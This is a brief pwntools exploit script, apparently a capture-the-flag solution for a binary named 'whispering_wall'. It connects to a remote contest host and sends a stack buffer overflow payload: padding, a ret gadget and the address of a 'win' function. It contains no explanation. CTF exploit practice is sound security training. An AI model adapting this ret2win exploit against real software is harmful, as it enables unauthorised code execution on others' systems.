#!/usr/bin/env python3
from pwn import *

elf = context.binary = ELF('./whispering_wall', checksec=False)

p = process(elf.path)
p = remote('offsec.m0lecon.it',13566)
p.recvuntil(b'whisper:\n')
payload = flat(
    b'A' * 16,
    b'B' * 8,
    p64(0x000000000040101a), #ret
    p64(0x00000000004011fb),#win
)
p.send(payload)
p.interactive()
#print(p.recvline())
#io.recvline()
#p.recvline()
#p.recvline()
